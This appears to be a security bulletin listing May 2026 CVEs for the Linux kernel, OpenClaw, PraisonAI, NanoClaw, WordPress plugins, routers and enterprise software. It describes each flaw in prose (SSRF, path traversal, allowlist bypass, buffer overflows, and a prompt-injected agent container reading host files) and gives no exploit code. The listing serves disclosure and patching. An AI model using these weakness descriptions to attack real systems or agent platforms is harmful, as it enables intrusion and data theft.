| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix DMA FIFO desync on error CQE SQ recovery In case of a TX error CQE, a recovery flow is triggered, mlx5e_reset_txqsq_cc_pc() resets dma_fifo_cc to 0 but not dma_fifo_pc, desyncing the DMA FIFO producer and consumer. After recovery, the producer pushes new DMA entries at the old dma_fifo_pc, while the consumer reads from position 0. This causes us to unmap stale DMA addresses from before the recovery. The DMA FIFO is a purely software construct with no HW counterpart. At the point of reset, all WQEs have been flushed so dma_fifo_cc is already equal to dma_fifo_pc. There is no need to reset either counter, similar to how skb_fifo pc/cc are untouched. Remove the 'dma_fifo_cc = 0' reset. This fixes the following WARNING: WARNING: CPU: 0 PID: 0 at drivers/iommu/dma-iommu.c:1240 iommu_dma_unmap_page+0x79/0x90 Modules linked in: mlx5_vdpa vringh vdpa bonding mlx5_ib mlx5_vfio_pci ipip mlx5_fwctl tunnel4 mlx5_core ib_ipoib geneve ip6_gre ip_gre gre nf_tables ip6_tunnel rdma_ucm ib_uverbs ib_umad vfio_pci vfio_pci_core act_mirred act_skbedit act_vlan vhost_net vhost tap ip6table_mangle ip6table_nat ip6table_filter ip6_tables iptable_mangle cls_matchall nfnetlink_cttimeout act_gact cls_flower sch_ingress vhost_iotlb iptable_raw tunnel6 vfio_iommu_type1 vfio openvswitch nsh rpcsec_gss_krb5 auth_rpcgss oid_registry xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink iptable_nat nf_nat xt_addrtype br_netfilter overlay zram zsmalloc rpcrdma ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm ib_core fuse [last unloaded: nf_tables] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.13.0-rc5_for_upstream_min_debug_2024_12_30_21_33 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:iommu_dma_unmap_page+0x79/0x90 Code: 2b 4d 3b 21 72 26 4d 3b 61 08 73 20 49 89 d8 44 89 f9 5b 4c 89 f2 4c 89 e6 48 89 ef 5d 41 5c 41 5d 41 5e 41 5f e9 c7 ae 9e ff <0f> 0b 5b 5d 41 5c 41 5d 41 5e 41 5f c3 66 2e 0f 1f 84 00 00 00 00 Call Trace: <IRQ> ? __warn+0x7d/0x110 ? iommu_dma_unmap_page+0x79/0x90 ? report_bug+0x16d/0x180 ? handle_bug+0x4f/0x90 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 ? iommu_dma_unmap_page+0x79/0x90 ? iommu_dma_unmap_page+0x2e/0x90 dma_unmap_page_attrs+0x10d/0x1b0 mlx5e_tx_wi_dma_unmap+0xbe/0x120 [mlx5_core] mlx5e_poll_tx_cq+0x16d/0x690 [mlx5_core] mlx5e_napi_poll+0x8b/0xac0 [mlx5_core] __napi_poll+0x24/0x190 net_rx_action+0x32a/0x3b0 ? mlx5_eq_comp_int+0x7e/0x270 [mlx5_core] ? notifier_call_chain+0x35/0xa0 handle_softirqs+0xc9/0x270 irq_exit_rcu+0x71/0xd0 common_interrupt+0x7f/0xa0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 | 2026-05-08 | 8.2 | CVE-2026-43466 | https://git.kernel.org/stable/c/821f85d619f7f22cda7b9d7de89cf5eeb1d11544 https://git.kernel.org/stable/c/6eb68ecc5acc3b319986566c595990b8a7265b23 https://git.kernel.org/stable/c/6f41f7812bfa7f991b732a4b45c5c52fc4be3b4e https://git.kernel.org/stable/c/383b37c04a4827ba60b2bafc1a6cdfd995aed58f https://git.kernel.org/stable/c/9c5ee9b981ee050b73fdf3f4a2464d6f1a8e10a8 https://git.kernel.org/stable/c/ce1b19dd0684eeb68a124c11085bd611260b36d9 https://git.kernel.org/stable/c/829efcccfa8f69db5dc8332961295587d218cee6 https://git.kernel.org/stable/c/1633111d69053512d099658d4a05fc736fab36b0 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.12 contains a server-side request forgery vulnerability in QQBot reply media URL handling that allows attackers to fetch arbitrary content. Attackers can exploit this by providing malicious media URLs that trigger SSRF requests, with fetched bytes subsequently re-uploaded through the channel. | 2026-05-05 | 8.2 | CVE-2026-43526 | GitHub Security Advisory (GHSA-2767-2q9v-9326) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw < 2026.4.12 - Server-Side Request Forgery via QQBot Reply Media URL Handling |
| OpenClaw--OpenClaw | OpenClaw versions 2026.2.23 before 2026.4.12 contain a weakened exec approval binding vulnerability in busybox and toybox applet execution that allows attackers to obscure which applet would actually run. Attackers can exploit opaque multi-call binaries to bypass exec approval mechanisms and weaken risk classification of unsafe applet invocations. | 2026-05-05 | 8.8 | CVE-2026-43530 | GitHub Security Advisory (GHSA-2cq5-mf3v-mx44) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.23 < 2026.4.12 - Weakened Exec Approval Binding via busybox and toybox Applet Execution |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an arbitrary file read vulnerability in QQBot media tags that allows attackers to reference host-local paths outside the intended media storage boundary. Attackers can craft malicious reply text containing media tags to disclose arbitrary local files through outbound media handling. | 2026-05-05 | 8.6 | CVE-2026-43533 | GitHub Security Advisory (GHSA-66r7-m7xm-v49h) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Arbitrary Local File Read via QQBot Media Tags |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains an authentication bypass vulnerability allowing untrusted workspace plugins to be auto-enabled during non-interactive onboarding when provider auth choices are shadowed. Attackers can exploit this by crafting malicious workspace plugins that are automatically selected and enabled during authentication setup without explicit user consent. | 2026-05-05 | 8.8 | CVE-2026-43569 | GitHub Security Advisory (GHSA-939r-rj45-g2rj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Untrusted Provider Plugin Auto-enablement via Workspace Provider Auth |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a plugin trust bypass vulnerability that allows channel setup catalog lookups to resolve workspace plugin shadows before bundled channel plugins. Attackers can exploit this by crafting malicious workspace plugins that bypass intended trust gates during setup-time plugin loading. | 2026-05-05 | 8.8 | CVE-2026-43571 | GitHub Security Advisory (GHSA-82qx-6vj7-p8m2) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Untrusted Workspace Plugin Shadow Resolution in Channel Setup |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an insufficient environment variable denylist vulnerability in its exec environment policy that allows operator-supplied overrides of high-risk interpreter startup variables including VIMINIT, EXINIT, LUA_INIT, and HOSTALIASES. Attackers can exploit this by manipulating these environment variables to influence downstream execution behavior or network connectivity. | 2026-05-06 | 8.8 | CVE-2026-43584 | GitHub Security Advisory (GHSA-vfp4-8x56-j7c5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Insufficient Environment Variable Denylist in Exec Policy |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 captures resolved bearer-auth configuration at startup, allowing revoked tokens to remain valid after SecretRef rotation. Gateway HTTP and WebSocket handlers fail to re-resolve authentication per-request, enabling attackers to use rotated-out bearer tokens for unauthorized gateway access. | 2026-05-06 | 8.1 | CVE-2026-43585 | GitHub Security Advisory (GHSA-xmxx-7p24-h892) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Bearer Token Validation Bypass via Stale SecretRef Resolution |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.7.16, the runWidget function in src/app/widgets/load-widget.js constructs a file path by directly concatenating user‑supplied widget identifiers without any sanitisation. Because runWidget is exposed to the renderer process via an asynchronous IPC handler with no input validation, an attacker who achieves JavaScript execution inside the renderer (for example, through a malicious plugin or a cross‑site scripting flaw in the built‑in webview) can abuse a path traversal (../) to load and execute an arbitrary JavaScript file anywhere on the victim's filesystem. This gives the attacker local code execution with the full privileges of the electerm process, leading to complete system compromise. This issue has been patched in version 3.7.16. | 2026-05-08 | 8.4 | CVE-2026-43940 | https://github.com/electerm/electerm/security/advisories/GHSA-f77v-9vpc-6pjm https://github.com/electerm/electerm/releases/tag/v3.7.16 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an authorization bypass vulnerability in Matrix room control-command authorization that trusts DM pairing-store entries. Attackers with DM-paired sender IDs can execute room control commands without being in configured allowlists by posting in bot rooms, potentially enabling privileged OpenClaw behavior. | 2026-05-06 | 8.8 | CVE-2026-44110 | GitHub Security Advisory (GHSA-2gvc-4f3c-2855) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw < 2026.4.15 - Authorization Bypass in Matrix Room Control Commands via DM Pairing Store |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains an exec allowlist analysis vulnerability allowing shell expansion hiding in unquoted heredoc bodies. Attackers can bypass allowlist validation by embedding shell expansion tokens in heredoc bodies to execute unapproved commands at runtime. | 2026-05-06 | 8.8 | CVE-2026-44115 | GitHub Security Advisory (GHSA-x3h8-jrgh-p8jx) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Shell Expansion Bypass in Unquoted Heredocs via Exec Allowlist |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a server-side request forgery vulnerability in the Zalo plugin's sendPhoto function that fails to validate outbound photo URLs through the SSRF guard. Attackers can bypass SSRF protection by providing malicious photo URLs to the Zalo Bot API, enabling unauthorized access to internal resources. | 2026-05-06 | 8.6 | CVE-2026-44116 | GitHub Security Advisory (GHSA-2hh7-c75g-qj2r) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Server-Side Request Forgery in Zalo Photo URL Validation |
| ProFTPD--ProFTPD | In ProFTPD through 1.3.9a before 7666224, a SQL injection vulnerability in sqltab_fetch_clients_cb() in contrib/mod_wrap2_sql.c allows a remote attacker to inject arbitrary SQL commands via a crafted domain name that is accessed in a reverse DNS lookup. When "UseReverseDNS on" is enabled, the attacker-supplied hostname is passed unescaped into SQL queries. The character restrictions of DNS names may affect exploitability. | 2026-05-05 | 8.1 | CVE-2026-44331 | https://github.com/proftpd/proftpd/issues/2057 https://github.com/proftpd/proftpd/commit/766622456440fbca33abd7927c523673a11d1ed1 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 4.5.139 to before version 4.6.32, CVE-2026-40287's fix gated tools.py auto-import behind PRAISONAI_ALLOW_LOCAL_TOOLS=true in two files (tool_resolver.py, api/call.py). A third import sink in praisonai/templates/tool_override.py was missed and remains unguarded. It is reached by the recipe runner on every recipe execution and is remotely triggerable through POST /v1/recipes/run with a recipe value pointing at any local absolute path or any GitHub repo (because SecurityConfig.allow_any_github defaults to True). The attacker drops a tools.py next to TEMPLATE.yaml; the server exec_module()s it. No auth required by default, no environment opt-in required. This issue has been patched in version 4.6.32. | 2026-05-08 | 8.4 | CVE-2026-44334 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-xcmw-grxf-wjhj |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.37 and praisonaiagents version 1.6.37, praisonaiagents resolves unresolved tool names against module globals and __main__ after it fails to match the declared tool list and the registry. With the default agent configuration, _perm_allow is None, so undeclared non-dangerous tool names are not rejected by the permission gate. An attacker who can influence tool-call names can therefore invoke unintended application callables that were never declared as tools. This issue has been patched in praisonai version 4.6.37 and praisonaiagents version 1.6.37. | 2026-05-08 | 8.6 | CVE-2026-44339 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gmjg-hv98-qggq |
| MailEnable--MailEnable Enterprise Premium | MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions. | 2026-05-08 | 8.1 | CVE-2026-44400 | https://www.mailenable.com/Premium-ReleaseNotes.txt https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin |
| wedevs--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to Deserialization of Untrusted Data in versions up to, and including, 4.3.1. This is due to insufficient input validation and type checking on the wpuf_files parameter during form submission, combined with unconditional deserialization via maybe_unserialize() when displaying post content. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary PHP objects, which can be leveraged to execute arbitrary code, delete arbitrary files, or perform other malicious actions if a POP chain is present on the target system. | 2026-05-08 | 8.8 | CVE-2026-5127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b5d27cc-c6eb-4c5c-8ee1-30483b91c6fd?source=cve https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/wpuf-functions.php#L959 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/wpuf-functions.php#L959 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/wpuf-functions.php#L1103 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/wpuf-functions.php#L1103 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L679 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L679 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L704 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L704 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L429 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L429 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L502 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L502 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php#L36 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Ajax/Frontend_Form_Ajax.php#L36 https://plugins.trac.wordpress.org/changeset/3514258/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-user-frontend/tags/4.3.1&new_path=%2Fwp-user-frontend/tags/4.3.2 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Stored XSS. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 8.8 | CVE-2026-5784 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| Ivanti--Endpoint Manager Mobile | An Improper Access Control vulnerability in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote authenticated attacker to gain administrative access. | 2026-05-07 | 8.8 | CVE-2026-5786 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| Ivanti--Endpoint Manager Mobile | An Improper Certificate Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to impersonate registered Sentry hosts and obtain valid CA-signed client certificates. | 2026-05-07 | 8.9 | CVE-2026-5787 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross-Site Scripting (XSS). This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 8.8 | CVE-2026-6002 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| MuffinGroup--Betheme | The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the upload_icons() function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files (including PHP) and achieve remote code execution via the Icons icon-pack upload flow. | 2026-05-05 | 8.8 | CVE-2026-6261 | https://www.wordfence.com/threat-intel/vulnerabilities/id/722c04c3-8f74-4081-b3a4-cb1ae2027312?source=cve https://support.muffingroup.com/changelog/ |
| Red Hat--Red Hat Ansible Automation Platform 2.5 for RHEL 8 | A flaw was found in the AAP gateway. The user auto-link strategy, introduced in AAP 2.6, automatically links an external Identity Provider (IDP) identity to an existing AAP user account based on email matching without verifying email ownership. This allows a remote attacker to potentially hijack a victim's account or gain unauthorized access to other accounts, including administrative accounts, by manipulating the IDP-provided email. | 2026-05-04 | 8.3 | CVE-2026-6266 | RHSA-2026:13508 RHSA-2026:13512 RHSA-2026:13545 https://access.redhat.com/security/cve/CVE-2026-6266 RHBZ#2458142 |
| www[.]pgbouncer[.]org--PgBouncer | The SCRAM code in PgBouncer before 1.25.2 did not check the return value of strlcat() correctly when building the contents of the SCRAM client-final-message. A malicious backend that sends a SCRAM server-final-message with a long nonce can trigger a stack overflow. | 2026-05-09 | 8.1 | CVE-2026-6665 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Arbitrary File Upload in versions 7.0.0 to 7.0.10 via the '_get_media_url' and '_check_file_path' function. This is due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files that may be executable, which makes remote code execution possible. The vulnerability was partially patched in version 7.0.10 and fully patched in version 7.0.11. | 2026-05-07 | 8.8 | CVE-2026-6692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e802a6-d2f1-47cc-883a-89110e569168?source=cve https://www.sliderrevolution.com/ |
| davidanderson--WP-Optimize Cache, Compress images, Minify & Clean database to boost page speed & performance | The WP-Optimize - Cache, Compress images, Minify & Clean database to boost page speed & performance plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the unscheduled_original_file_deletion function in all versions up to, and including, 4.5.2. This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This is possible because 'original-file' is a public (non-protected) meta key - it does not begin with an underscore - allowing Authors to freely create or modify it on their own attachment posts via the standard Edit Media form or the REST API. | 2026-05-07 | 8.1 | CVE-2026-7252 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc815ef2-dd02-4faa-b202-dd1552f889db?source=cve https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L1649 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L1649 https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L1645 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L1645 https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L81 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L81 https://plugins.trac.wordpress.org/changeset/3518513/wp-optimize/trunk/includes/class-updraft-smush-manager.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-optimize/tags/4.5.2&new_path=%2Fwp-optimize/tags/4.5.3 |
| Eclipse Foundation--Eclipse BaSyx | In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS). | 2026-05-05 | 8.6 | CVE-2026-7412 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423 https://gitlab.eclipse.org/security/cve-assignment/-/issues/103 |
| Totolink--WA300 | A vulnerability was determined in Totolink WA300 5.2cu.7112_B20190227. This issue affects the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Manipulating the File argument leads to a buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-04 | 8.8 | CVE-2026-7717 | VDB-360893 | Totolink WA300 POST Request cstecgi.cgi UploadCustomModule buffer overflow VDB-360893 | CTI Indicators (IOB, IOC, IOA) Submit #807193 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-UploadCustomModule-34553a41781f80a8a287e48a7fb04de9 https://www.totolink.net/ |
| Totolink--N300RH | A weakness has been identified in Totolink N300RH 3.2.4-B20220812. Affected by this issue is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Manipulating the FileName argument leads to a buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-04 | 8.8 | CVE-2026-7748 | VDB-360923 | Totolink N300RH POST Request cstecgi.cgi setUpgradeFW buffer overflow VDB-360923 | CTI Indicators (IOB, IOC, IOA) Submit #807202 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setUpgradeFW-34553a41781f80abb1d1c627d7ff4329?pvs=73 https://www.totolink.net/ |
| Totolink--N300RH | A security vulnerability has been detected in Totolink N300RH 3.2.4-B20220812. This affects the function setWanConfig of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Manipulating the priDns argument leads to a buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 8.8 | CVE-2026-7749 | VDB-360924 | Totolink N300RH POST Request cstecgi.cgi setWanConfig buffer overflow VDB-360924 | CTI Indicators (IOB, IOC, IOA) Submit #807203 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setWanConfig-34553a41781f80ed8500d9b8d54074f2 https://www.totolink.net/ |
| Totolink--N300RH | A vulnerability was detected in Totolink N300RH 3.2.4-B20220812. This vulnerability affects the function setMacFilterRules of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Manipulating the mac_address argument results in a buffer overflow. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-04 | 8.8 | CVE-2026-7750 | VDB-360925 | Totolink N300RH POST Request cstecgi.cgi setMacFilterRules buffer overflow VDB-360925 | CTI Indicators (IOB, IOC, IOA) Submit #807204 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setMacFilterRules-34553a41781f809cb952cdcb71ce90d8 https://www.totolink.net/ |
| SmarterTools Inc.--SmarterMail | SmarterTools SmarterMail builds prior to 9560 contain a local file inclusion vulnerability in the /api/v1/report/summary/{type} API endpoint that allows authenticated users to read arbitrary .json files on the system. Attackers can exploit this vulnerability combined with weak encryption algorithms and hardcoded keys to decrypt and access stored passwords and 2FA secrets for all users. | 2026-05-08 | 8.1 | CVE-2026-7807 | https://www.smartertools.com/smartermail/release-notes/current https://www.vulncheck.com/advisories/smartertools-smartermail-build-9560-server-local-file-inclusion-via-the-api-v1-report-summary-type-api |
| GeoVision Inc.--ASManager | A remote code execution vulnerability exists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated user with System Setting permissions can execute arbitrary commands on the server by sending a crafted HTTP POST request to the ASWebCommon.srf backend endpoint to bypass the frontend restrictions. | 2026-05-06 | 8.8 | CVE-2026-7841 | https://www.geovision.com.tw/cyber_security.php |
| D-Link--DI-8100 | A vulnerability was detected in D-Link DI-8100 16.07.26A1. Affected by this issue is the function tggl_asp of the file /tggl.asp of the component HTTP Request Handler. Manipulating the Name argument results in a buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-05-05 | 8.8 | CVE-2026-7855 | VDB-361132 | D-Link DI-8100 HTTP Request tggl.asp tggl_asp buffer overflow VDB-361132 | CTI Indicators (IOB, IOC, IOA) Submit #807841 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/tggl_asp_overflow.md https://www.dlink.com/ |
| Qwibit--NanoClaw | NanoClaw version 1.2.0 and prior contains a host/container filesystem boundary vulnerability in outbound attachment handling and outbox cleanup that allows a compromised or prompt-injected container to read files outside the intended outbox directory by supplying crafted messages_out.id and content.files values or creating symlinked outbox files. Attackers can exploit this vulnerability to trigger host-side reads of arbitrary files and in some cases achieve recursive deletion of paths outside the intended cleanup target. | 2026-05-06 | 8.8 | CVE-2026-7875 | https://github.com/qwibitai/nanoclaw/pull/2001 https://github.com/qwibitai/nanoclaw/commit/7814e45570edf0024a1a5c2ba9fbc9cb3a49f7f7 https://github.com/qwibitai/nanoclaw/releases/tag/v1.2.0 |
| Totolink--X5000R | A vulnerability has been found in Totolink X5000R 9.1.0u.6369_B20230113. This vulnerability affects the function sub_458E40 of the file /boafrm/formDdns. Manipulating the submit-url argument leads to a buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-05-08 | 8.8 | CVE-2026-8137 | VDB-361926 | Totolink X5000R formDdns sub_458E40 buffer overflow VDB-361926 | CTI Indicators (IOB, IOC, IOA) Submit #808863 | Totolink X5000R V9.1.0u.6369_B20230113 Stack-based Buffer Overflow https://github.com/Kiciot/cve/issues/4 https://www.totolink.net/ |
| Tenda--CX12L | A vulnerability was found in Tenda CX12L 16.03.53.12. This issue affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation results in a stack-based buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-08 | 8.8 | CVE-2026-8138 | VDB-361927 | Tenda CX12L SetPptpServerCfg formSetPPTPServer stack-based overflow VDB-361927 | CTI Indicators (IOB, IOC, IOA) Submit #808867 | Tenda CX12L V16.03.53.12 Stack-based Buffer Overflow https://github.com/cve-a/lvdan/issues/6 https://www.tenda.com.cn/ |
| Amazon--Amazon Redshift JDBC Driver | An issue exists in Amazon Redshift JDBC Driver versions prior to 2.2.2. Under certain conditions, the driver could load and execute arbitrary classes when processing JDBC connection URL parameters. An actor who can influence the connection URL could potentially execute code in the application context, provided a suitable class is available on the application's classpath. To mitigate this issue, users should upgrade to version 2.2.2 or later. | 2026-05-08 | 8.1 | CVE-2026-8178 | https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2 https://aws.amazon.com/security/security-bulletins/2026-028-aws/ https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-wmmv-vvg5-993q |
| EFM--ipTIME A8004T | A security vulnerability has been detected in EFM ipTIME A8004T 14.18.2. This vulnerability affects the function formWifiBasicSet of the file /goform/WifiBasicSet. Manipulating the security_5g argument leads to a stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 8.8 | CVE-2026-8234 | VDB-362454 | EFM ipTIME A8004T WifiBasicSet formWifiBasicSet stack-based overflow VDB-362454 | CTI Indicators (IOB, IOC, IOA) Submit #808865 | IPTIME A8004T 14.18.2 Stack-based Buffer Overflow https://github.com/Kiciot/cve/issues/5 |
| memono--Notepad | memono Notepad 4.2 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character buffers into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash on iOS devices. | 2026-05-10 | 7.5 | CVE-2021-47944 | ExploitDB-49977 VulnCheck Advisory: memono Notepad 4.2 Denial of Service via Buffer Overflow |
| argus--Argus Surveillance DVR | Argus Surveillance DVR 4.0 contains an unquoted service path vulnerability in the DVRWatchdog service that allows local attackers to escalate privileges by exploiting the service binary path. Attackers can place a malicious executable in the Program Files directory to be executed with LocalSystem privileges when the service starts. | 2026-05-10 | 7.8 | CVE-2021-47945 | ExploitDB-50261 VulnCheck Advisory: Argus Surveillance DVR 4.0 Unquoted Service Path Privilege Escalation |
| Backupbliss--WordPress Plugin Backup Migration | WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps. | 2026-05-05 | 7.5 | CVE-2023-54346 | ExploitDB-51445 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Backup Migration 1.2.8 Unauthenticated Database Backup Download |
| Open-Emr--OpenEMR | OpenEMR 7.0.1 contains an authentication brute force vulnerability that allows attackers to bypass rate limiting protections by sending repeated login attempts to the main login endpoint. Attackers can submit POST requests with authUser and clearPass parameters to systematically test username and password combinations without account lockout restrictions. | 2026-05-05 | 7.5 | CVE-2023-54347 | ExploitDB-51413 Official Product Homepage Product Reference VulnCheck Advisory: OpenEMR 7.0.1 Authentication Brute Force Mitigation Bypass |
